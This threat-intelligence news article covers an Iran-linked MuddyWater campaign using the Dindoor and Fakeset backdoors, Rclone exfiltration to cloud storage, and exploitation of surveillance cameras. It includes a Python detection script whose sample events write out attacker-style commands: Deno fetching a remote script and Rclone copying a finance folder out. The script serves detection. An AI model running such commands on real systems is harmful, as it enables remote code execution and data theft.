Iran-Linked MuddyWater Hackers Deploy New “Dindoor” Backdoor in Campaign Targeting U.S. Networks

By Ash K

Cybersecurity researchers have uncovered a new campaign attributed to the Iranian state-linked hacking group MuddyWater, which has embedded itself inside several U.S. organizations and deployed a previously unknown backdoor called Dindoor.

The activity, discovered by researchers from Broadcom’s Symantec and Carbon Black Threat Hunter teams, targeted multiple sectors including financial institutions, airport infrastructure, nonprofit organizations, and a software company connected to the defense and aerospace supply chain.

Targets Across Multiple Critical Sectors

Investigators found evidence that the threat actors had established footholds in networks belonging to a U.S. bank, a Canadian nonprofit, and a software company whose Israeli branch appears to have been the primary focus of the campaign.

The affected company supplies technology to defense and aerospace industries, making it a potentially valuable intelligence target. Researchers believe the attacks began in early February and continued amid rising geopolitical tensions following U.S. and Israeli military strikes involving Iran.

The Dindoor Backdoor

A key component of the operation is a newly discovered malware implant called Dindoor. The backdoor leverages the Deno JavaScript runtime, allowing attackers to execute commands and maintain persistent access inside compromised systems.

Using modern runtime environments such as Deno gives attackers a flexible platform to execute scripts and evade traditional security monitoring tools that may focus primarily on conventional malware families.

Researchers also observed attempts to exfiltrate data using the Rclone utility, which was configured to transfer files to a Wasabi cloud storage bucket. It remains unclear whether the data transfer succeeded.
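Two of the behaviours described above, a Deno runtime pulling a script from a remote URL and Rclone pushing data to a Wasabi bucket, are visible in ordinary process-creation telemetry. The following is an added detection sketch, not code from Symantec, Carbon Black or the article; the event field names and the sample events are constructed for illustration.

```python
"""Detection sketch for two tradecraft points in the MuddyWater report:
a Deno-hosted backdoor and Rclone exfiltration to Wasabi storage.
Event records and field names are constructed sample data (assumption),
not telemetry from the incidents described."""
import re

# Constructed sample process-creation events (assumed schema: host, image, cmdline).
SAMPLE_EVENTS = [
    {"host": "ws01", "image": r"C:\Program Files\deno\deno.exe",
     "cmdline": "deno run --allow-all https://update.example.invalid/agent.ts"},
    {"host": "ws02", "image": r"C:\Tools\rclone.exe",
     "cmdline": "rclone copy D:\\Finance remote:staging --s3-provider Wasabi"},
    {"host": "ws03", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"host": "ws04", "image": r"C:\Tools\rclone.exe",
     "cmdline": "rclone sync C:\\Backups backup-nas:share"},
]


def classify(event):
    """Return the detection names that fire for a single event."""
    cmd = event["cmdline"]
    exe = event["image"].lower().rsplit("\\", 1)[-1]
    hits = []
    # Deno executing a script fetched over HTTP(S): the runtime itself is
    # benign, so the signal is the remote script source, not deno.exe alone.
    if exe == "deno.exe" and re.search(r"\bhttps?://", cmd):
        hits.append("deno_remote_script")
    # Rclone with a Wasabi provider/endpoint named on the command line.
    # Caveat: remotes defined in rclone.conf will not show up here, so pair
    # this with network telemetry for the storage provider's endpoints.
    if exe == "rclone.exe" and re.search(r"wasabi", cmd, re.I):
        hits.append("rclone_wasabi_exfil")
    # Any other outbound rclone transfer is worth review where rclone is
    # not an approved tool.
    elif exe == "rclone.exe" and re.search(r"\b(copy|sync|move)\b", cmd):
        hits.append("rclone_transfer")
    return hits


def scan(events):
    """Return the set of (host, detection) pairs across all events."""
    return {(e["host"], name) for e in events for name in classify(e)}


if __name__ == "__main__":
    for host, name in sorted(scan(SAMPLE_EVENTS)):
        print(f"{host}: {name}")
```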

Additional Malware: Fakeset Python Backdoor

In separate incidents involving a U.S. airport and a nonprofit organization, analysts identified another backdoor called Fakeset. This malware was written in Python and delivered from infrastructure hosted on Backblaze cloud storage servers.

The digital certificate used to sign Fakeset has previously been associated with other MuddyWater-linked malware families, including Stagecomp and Darkcomp, strengthening attribution to the same threat actor.

Advanced Social Engineering Tactics

Security researchers say MuddyWater has significantly improved its capabilities in recent years. Beyond technical malware development, the group has demonstrated strong proficiency in social engineering campaigns.

These include spear-phishing operations and so-called “honeytrap” tactics in which attackers build relationships with targets to gain access to accounts or sensitive information.

Parallel Activity Targeting Surveillance Cameras

Additional research indicates that other Iran-linked groups are simultaneously scanning for vulnerable surveillance systems, particularly Hikvision and Dahua IP cameras. Known vulnerabilities such as CVE-2017-7921 and CVE-2023-6895 are being actively exploited in these campaigns.

Exploitation attempts have surged across Israel and several Gulf countries including the United Arab Emirates, Qatar, Bahrain, and Kuwait. Security analysts believe compromised cameras could provide reconnaissance capabilities or enable battle damage assessment following missile strikes.

Cyber Activity Intensifies Amid Geopolitical Conflict

The discovery comes amid escalating tensions in the Middle East, where cyber operations have increasingly accompanied conventional military activity.

Hacktivist groups aligned with Iranian interests, including those linked to the Handala Hack collective, have also been observed routing attacks through Starlink IP infrastructure to probe external-facing applications for misconfigurations and weak credentials.

At the same time, security authorities are warning that cyber retaliation may expand beyond regional targets. The Canadian Centre for Cyber Security has issued an advisory cautioning that Iran could conduct retaliatory attacks against critical infrastructure and engage in broader information operations.

A Persistent Cyber Threat

The latest findings reinforce the view among cybersecurity experts that Iran’s cyber capabilities continue to evolve. By combining custom malware, cloud-based exfiltration tools, and targeted social engineering campaigns, groups like MuddyWater remain capable of infiltrating critical networks across multiple countries.

As geopolitical tensions deepen, security analysts expect both state-linked operators and aligned hacktivist groups to remain active in the digital domain, probing networks and seeking strategic advantages far beyond the physical battlefield.

Ash K
Ashton is a seasoned cybersecurity professional with over 25 years of experience in cybersecurity research, incident response, and product and security solutions architecture.